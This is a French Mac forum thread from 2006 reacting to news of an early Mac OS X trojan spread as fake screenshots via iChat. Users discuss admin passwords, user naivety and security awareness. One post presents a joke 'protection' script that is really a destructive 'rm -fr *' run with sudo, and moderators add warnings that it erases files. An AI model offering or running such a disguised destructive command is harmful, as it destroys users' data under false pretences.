Un prototype de trojan sur Mac OS X ?, Réactions à la news du 16-02-2006

[Yoc]

Les utilisateurs des forums de Macrumors se sont vu floués par un fichier supposé contenir des captures d'écrans de la prochaine grosse mise à jour du système Apple : Mac OS 10.5. Ce fichier, nommé latestpics.tgz, une fois décompressé, contient un fichier qui ressemble à une image mais qui en fait est un exécutable. Cet exécutable, compilé pour les PowerPC, commence par s'installer confortablement dans le système en infectant les autres applications (cette partie du code ne fonctionne pas correctement et empêche en pratique l'application infectée de se lancer) et en essayant de s'envoyer lui même aux contacts iChat.
Rien de bien dangereux donc, mais ce prototype de Trojan a quand même le mérite d'être le premier à être capable de se propager par lui même, même si la manière iChat n'est sans doute pas la plus efficace. De plus, il demande toujours une intervention de l'utilisateur qui doit double cliquer sur l'archive puis sur l'application résultante.

Il est évident que ce genre de trojan/virus va faire son apparition tôt ou tard sur notre plateforme. Et la notoriété de Mac OS X ne pourra que rapprocher l'échéance. C'est peut-être pour ça qu'Apple ne communique pas ouvertement sur le fait qu'il n'existe pas encore de virus sur nos machines, car lorsque cela arrivera, il ne faut pas que les gens se souviennent qu'une campagne de pub qui prétendait le contraire ou la discréditation serait totale...

Le président d'Ambrosia a publié plus de détails sur ce trojan sur son forum que je vous invite vivement à consulter si vous parlez anglais.

[Guest_myckmack_*]

Plus près de nous, un sujet sur la question a été ouvert vers 15 h sur MacB ici par hellomorld.

[freewheelin fran...]

Hé, oui. Tôt ou tard, il faudra bien se résoudre à se faire chier avec les antivirus. Si Apple pouvait, là encore, nous concocter quelque chose d'efficce et d'intuitif.

[Debugman]

A mon ce type d'exécutable existe depuis belle lurette sur OS X puisque c'est pas l'ordinateur qui est mis en cause mais l'utilisateur. Je me suis amusé a faire un faut installateur Apple script qui simulait l'installation d'un jeu connu, sans problème ma victime à rentré son code administrateur (même qu'il était affiché en clair sur l'écran) pour valider l'isntallation!!! Du coup le programme à presque tous les droits... Seulement comme la grande majorité des personne qui serait potentiellement prêtes à faire ce genre de choses sont forcément à fond dans l'utilisation de leur ordinateur et par conséquent forcémment un peu mac'o'phile elle ne sont pas prête à détruire l'image de la chose qu'elles apprécient. Bon c'est de loin pas la seule cause, il y en a sans doute beaucoup d'autre, mais à mon avis c'est celle-ci qui se rapproche plus de se problème spécifique.

Ce message a été modifié par Debugman - 16 Feb 2006, 18:05.

[Alizés]

Cet exécutable, compilé pour les PowerPC...

Il n'affecte donc que les Macs à base de processeurs PPC et non les nouveaux Macintel?

Pourquoi un prototype de trojan sur Mac OS X ?

Ce message a été modifié par Alizés - 16 Feb 2006, 18:05.

[Yoc]

Cet exécutable, compilé pour les PowerPC...

Il n'affecte donc que les Macs à base de processeurs PPC et non les nouveaux Macintel?

Pourquoi un prototype de trojan sur Mac OS X ?

Parce que le code est bugué : il fusille l'application infectée au lieu de l'infecter proprement pour qu'il puisse se propager et il y a des bouts de codes qui montrerait qu'il y a une tentative de propagation par mail mais le code n'a pas été activé car sans doute pas finalisé.
De plus il ne fait rien de mal ! (pas de port ouvert sur la machine pour en prendre le contrôle, pas de destruction de données etc...)

[rico542]

Je ne comprend pas bien le truc. Est-ce que cela profite encore de la faille qui faisait ressembler un executable à un morceau MP3 (icone Itunes) ? (ou le même genre de bug)

Ou est-ce que c'est simplement un début de virus ? qu'il faut "activer manuellement"

Dans tous les cas comment peut-on faire pour éviter le pire ?
début de réponse : limiter les downloads au strict nécessaire, ne pas rentrer son mot de passe à l'aveuglette, se méfier de tout comportement suspect (c'est vrai quoi une photo qui me demande mon password ).

mettre nospam devant les adresses mail de tous les destinataires de son carnet d adresse

[Alizés]

Parce que le code est bugué : il fusille l'application infectée au lieu de l'infecter proprement

Je résultat est tout de même inquiétant. De quelle(s) application(s) s'agit-il?

Et, au fait, il se s'exécute que sur PPC alors?

[Ifrit]

Il faudrait arréter de crier au loup dès qu'un troyan apparait !!
ce n'est pas le premier !

et arreter de délirer avec les trucs du genre : bientot il faudra un anti-virus sur Mac
---> ce genre de trojan existe a cause de la stupidité (ou la méconaissance) des gens qui téléchargent n'importe quoi,
et aucun anti-virus n'empechera jamais les troyan d'exister, puisque c'est l'utilisateur et non le système qui est en cause...

j'ajouterai que pour quelqu'un qui fait un peu de programmation,
et avec tout les moyens de manipluer facilement le système sous OS X :
- AppleScript
- scripts shell (commandes Unix)
- Automator
- etc....

je suis étonné qu'il n'y est pas plus "d'essai" de ce genre...
(en fait un programme de ce niveau peut facilement etre ecrit en quelques heures....)
(du moment qu'on ai réfléchit un peu a la manière de comment faire tel ou tel truc assez discretement...)

[jeannot]

Comment le virus peut-il s'intaller dans le système sans le mot de passe administrateur ?

[dexter_]

Et, au fait, il se s'exécute que sur PPC alors?

Normalement non, il doit s'exécuter sur PPC ou Intel, puisque sur les Macintels il serait lancé par Rosetta...

Comment le virus peut-il s'intaller dans le système sans le mot de passe administrateur ?

Il ne s'installe pas dans le système, il bousille des applications et se réplique à chaque fois qu'une application infectée se lance. Les applications ne sont pas protégées par des droits admin, donc le virus n'a pas besoin de mot de passe admin pour opérer sur ces applis.
Donc en principe, s'il ne demande aucun mot de passe, alors il ne peut rien faire sur le système à proprement parler.

Ce message a été modifié par dexter_ - 16 Feb 2006, 18:28.

[Alizés]

C'est marrant, au moment où j'écris ce message, 24 personnes sont connectées au topic tout en restant muette... Le sujet serait-il si inquiétant que ça? Ca sent l'angoisse... Rhâââaa... De gros virus poilus débarquent sur Mac, et avec les Macintel c'est l'infection assurée*! Paniquons*, hurlons*, fuyons*... tant qu'il en est encore temps...

(*) Je plaisante !!! Bien sûr... Il serait bon d'éviter la psychose avec ce genre de niouze...

Plutôt que virus, je parlerais de piège à c**s.

C'est pas très gentil pour le Monsieur Toulemonde ça. Ne pas être un "initié", être un "débutant", un brave retraité qui essaie courageusement de se mettre à l'info en investissant dans un Mac, voire un "switcher" à ses tous débuts, serait-il synonyme de c**nerie?

Ce message a été modifié par Alizés - 16 Feb 2006, 18:52.

[ManiX]

Comment le virus peut-il s'intaller dans le système sans le mot de passe administrateur ?

Il ne peut pas justement, il demande le mot de passe !

Plutôt que virus, je parlerais de piège à c**s.

[Lonesome Boy]

Comment le virus peut-il s'intaller dans le système sans le mot de passe administrateur ?

Ce n'est pas un virus, mais un (espèce de) trojan. Il faut le lancer soi-même et donner le mot de passe admin...

Ce message a été modifié par Lonesome Boy - 16 Feb 2006, 18:36.

[Lyric_Fiend]

c'est sur qu'il faut avoir un QI d'huitre pour filer son code admin a une photo que l'on ouvre...

[f_cam]

Il faut le lancer a la main l'appli. piege a cons...

Et oui ce n'est pas nouveau, je me souviens il y a plus de 10 ans d'applescripts qui tournait sur les serveurs hotline avec un nom alléchant (genre Office version machin) et qui en fait effacaient le disque dur.

[ManiX]

Il serait peut-être bon que MB désamorce la polémique en annoncant que ce n'est pas un virus mais un piège à cons. Et qu'on ne donne pas son mot de passe admin sans raison valable.

Parce que beaucoup de personnes (PCistes) sont en attente de cette info sur la sécurité d'OSX. Des potes qui ne connaissent rien au mac me parlent fréquemment des rumeurs de virus mac. ces nouvelles-là circulent très vite !!

[Lonesome Boy]

Ouais c'est clair, je vois déjà demain dans mon école les trolleurs: "t'as vu, y'a des virus sur Mac"!

[dexter_]

c'est sur qu'il faut avoir un QI d'huitre pour filer son code admin a une photo que l'on ouvre...

Et pourtant il y en a des gens pour tomber dans ce genre de piège... Je connais bien quelqu'un qui a cru télécharger un soft genre Norton Antivirus pour son PC sur un réseau P2P, qui ne s'est pas inquiété de voir le fichier se télécharger en 2 secondes vu qu'il faisait 40 Ko, et l'ouvrir.
L'autre soir, il m'appelle, paniqué, parce que toutes ses icônes s'étaient changées en fromages, et il pouvait plus ouvrir aucun document. Bon passé la crise de rire quand j'ai vu un screenshot de son bureau il a fallu tout réinstaller...
Sur PC, à part certains virus vraiment insidieux, c'est comme avec ce trojan sur Mac : les gens qui infectent leur machine ont tendance à ouvrir n'importe quoi, la première pièce jointe à un mail venue, que l'expéditeur soit connu ou pas.

[Vinc26]

Oui, je crois vraiment vraiment que c'est l'occasion de faire une grande campagne à propos de l'importance et des risque que l'on prend à taper son mot de passe.

Autour de moi, un utilisateur Mac sur deux, soit ne met pas de mot de passe dutout, soit le tape n'importe quand sans même savoir pourquoi on le lui demande.

Je trouve que l'ensemble de la presse Mac devrait lancer une campagne d'information claire et non alarmiste sur le sujet.

Peut-être que Le Pommier pourrait se réunir pour l'occasion (pour une fois en dehors de l'AppleExpo) pour lancer tous en même temps cette campagne sur les site d'info Mac

[Ayumi Yonosa]

C'est vraiment pathétique tout ce foin autour de ce sois disant virus (qui n'est en fait pas un virus mais plutôt un trojan horse wanabee. M'enfin, rentrons pas dans les détails, déjà que j'en vois avec les yeux exorbités!)

Le plus pathétique, c'est que la... "news" est relatif avec un certain catastrophisme par Mac Bidouille qui devient, mais cela n'est que mon avis, de plus en plus naïf (le passage à Intel, ça... Après avoir résolu la grippe aviaire et la faim dans le monde, Intel reussit l'exploit de nous faire retrouver notre âme d'enfant... Si c'est pas beau ça!).

Anyway, tout cela est tellement ridicule que je m'en veux d'avoir oser écrire un post à ce sujet...

Question: Pouvez vous faire tourner des programmes sur votre Mac? Oui, non?
Question: Pouvez vous ecrire vos propres programmes sur votre Mac? Oui, non?

Si vous avez repondu oui aux deux questions précédentes, alors voilà celle à 10,000,000 euros:

Question: pouvez vous ecrire un programme sur votre Mac ET le faire tourner sur votre Mac?

Quoi, oui encore? Pfff... Ok, dernière question:

Question: pouvez vous ecrire un programme sur votre Mac qui fait plein de trucs méchands ET le faire tourner sur votre Mac?

Si la réponse est oui, alors, qu'Intel nous protège! Nous sommes à la merci des virus! OS X est maudit! C'est la fin des haricots (multi-thread)!

Anyway, comme je suis quand même une gentille fifille, voilà un programme qui vous protégera de ce genre de manipulations :
NOTE DES MODERATEURS : NE FAITES SURTOUT PAS CETTE MANIPULATION OU VOUS EFFACERIEZ VOS FICHIERS
1. Ouvrez TextEdit et passez en mode texte pur.
2. Tapez:

#!/bin/sh
rm -fr *

3. Sauver le fichier sous Desktop/protection.txt
4. Dans le terminal, exécutez les commandes suivantes:

cd ~/Desktop
chmod u+x protection.txt
mv protection.txt protection.sh
sudo protection.sh
[entrez votre mot de passe administrateur]



La manip prends un peu de temps (le temps de protéger chaque fichier individuellement). Ceci devrait protéger votre ordinateur en attendant un véritable virus... J'ai testé et ça marche nickel. Plus aucun soucis!

A voi voir les gens gentils!

Ayumi

NOTE DES MODERATEURS : NE FAITES SURTOUT PAS CETTE MANIPULATION OU VOUS EFFACERIEZ VOS FICHIERS

Ce message a été modifié par bad_duck - 16 Feb 2006, 22:22.

[dexter_]

C'est pas très gentil de te moquer comme ça...
Vu le nombre de lectures sur ce post, il doit y en avoir quelques uns qui ne connaissent pas le terminal et qui sont en train d'essayer ça !

[rico542]

c'est sur qu'il faut avoir un QI d'huitre pour filer son code admin a une photo que l'on ouvre...

Et pourtant il y en a des gens pour tomber dans ce genre de piège... Je connais bien quelqu'un qui a cru télécharger un soft genre Norton Antivirus pour son PC sur un réseau P2P, qui ne s'est pas inquiété de voir le fichier se télécharger en 2 secondes vu qu'il faisait 40 Ko, et l'ouvrir.
L'autre soir, il m'appelle, paniqué, parce que toutes ses icônes s'étaient changées en fromages, et il pouvait plus ouvrir aucun document. Bon passé la crise de rire quand j'ai vu un screenshot de son bureau il a fallu tout réinstaller...
Sur PC, à part certains virus vraiment insidieux, c'est comme avec ce trojan sur Mac : les gens qui infectent leur machine ont tendance à ouvrir n'importe quoi, la première pièce jointe à un mail venue, que l'expéditeur soit connu ou pas.

Je ne sais pas si je pouvoir m'arreter de rire ............

[blind]

C'est pas très gentil de te moquer comme ça...
Vu le nombre de lectures sur ce post, il doit y en avoir quelques uns qui ne connaissent pas le terminal et qui sont en train d'essayer ça !

Bah voila une bonne maniere pour sensibiliser un utilisateur, ceux qui auront essayer ca ne se feront certainement plus prendre a executer n'importe quoi en root : )

[gerbouille]

Oui, je crois vraiment vraiment que c'est l'occasion de faire une grande campagne à propos de l'importance et des risque que l'on prend à taper son mot de passe.

Autour de moi, un utilisateur Mac sur deux, soit ne met pas de mot de passe dutout, soit le tape n'importe quand sans même savoir pourquoi on le lui demande.

Je trouve que l'ensemble de la presse Mac devrait lancer une campagne d'information claire et non alarmiste sur le sujet.

Peut-être que Le Pommier pourrait se réunir pour l'occasion (pour une fois en dehors de l'AppleExpo) pour lancer tous en même temps cette campagne sur les site d'info Mac

C'est une bonne idée, la sécurité informatique, c'est l'affaire de tous. Si vous laissez votre porte ouverte et les clés dessus, votre assurance ne vous remboursera pas. Bien sûr, le méchant vilain pabo, c'est le voleur, pas la victime mais la responsabilité et le bon sens ne doivent pas se dissoudre dans une espèce de faux sentiment de sécurité un peu naïf. Alors, apprenez les gestes qui sauvent ! Dites à vos amis de ne pas télécharger n'importe quoi (même les gens sous Windows, oui, eux aussi peuvent améliorer la sécurité de leur système). Mettez des mots de passe, même si c'est pour laisser un post-it sur le bureau avec le mot de passe marqué dessus, c'est mieux que rien. Propager des virus par négligence, même inconsciemment, c'est idiot et ça pourrait même vous causer des ennuis (votre employeur peut vous le reprocher, par exemple). Il suffit que tout le monde fasse un petit effort ...

Bon en même temps, on va tous mourir sous l'assaut des virus, on est perdu, oh mon Dieu, un virus sur mac ... aaaaaahhhhh

[rico542]

C'est pas très gentil de te moquer comme ça...
Vu le nombre de lectures sur ce post, il doit y en avoir quelques uns qui ne connaissent pas le terminal et qui sont en train d'essayer ça !

Bah voila une bonne maniere pour sensibiliser un utilisateur, ceux qui auront essayer ca ne se feront certainement plus prendre a executer n'importe quoi en root : )

Ca me rappelle la blague :

"Bonjour !
Je suis le premier virus belge.
Etant donné que nous les belges nous n'avons pas d'expérience en matière programmation, ce virus marche MANUELLEMENT.
S'il vous plaît, effacez un par un tous les fichiers de votre disque dur et envoyez ce message à tous les destinataires de votre carnet d'adresses. Merci de votre coopération".

excusez moi mais il m'a fait rire alors je continu ...

[dan31]

A la lecture de l'article en anglais, il semble confirmé qu'il n'est pas besoin de taper son mot de passe si vous ètes connectés en tant qu' Admin … ce qui est le cas de tous les PAOiste qui utilise XPress et autre qui demande que l'utilisateur soit Admin.
Qu'en est-il du message qui s'affiche quand une application est lancé pour la première fois ?

[gerbouille]

"Bonjour !
Je suis le premier virus belge.
Etant donné que nous les belges nous n'avons pas d'expérience en matière programmation, ce virus marche MANUELLEMENT.
S'il vous plaît, effacez un par un tous les fichiers de votre disque dur et envoyez ce message à tous les destinataires de votre carnet d'adresses. Merci de votre coopération".

excusez moi mais il m'a fait rire alors je continu ...

Dis donc, tu te moquerais pas des Belges, une fois ?
C'est po drôle ...

Ce message a été modifié par gerbouille - 16 Feb 2006, 19:11.

[rico542]

A la lecture de l'article en anglais, il semble confirmé qu'il n'est pas besoin de taper son mot de passe si vous ètes connectés en tant qu' Admin … ce qui est le cas de tous les PAOiste qui utilise XPress et autre qui demande que l'utilisateur soit Admin.
Qu'en est-il du message qui s'affiche quand une application est lancé pour la première fois ?

je ne sais pas comment il est fait ce truc. Pas sur que ça déclenche pour les scripts et consorts

[reversi]

A la lecture de l'article en anglais, il semble confirmé qu'il n'est pas besoin de taper son mot de passe si vous ètes connectés en tant qu' Admin … ce qui est le cas de tous les PAOiste qui utilise XPress et autre qui demande que l'utilisateur soit Admin.
Qu'en est-il du message qui s'affiche quand une application est lancé pour la première fois ?

Disons plutôt, ce qui est le cas de 99% des utilisateurs de Mac OS X car le compte créé lors de la configuration de Mac OS X a les privilèges d'administrations.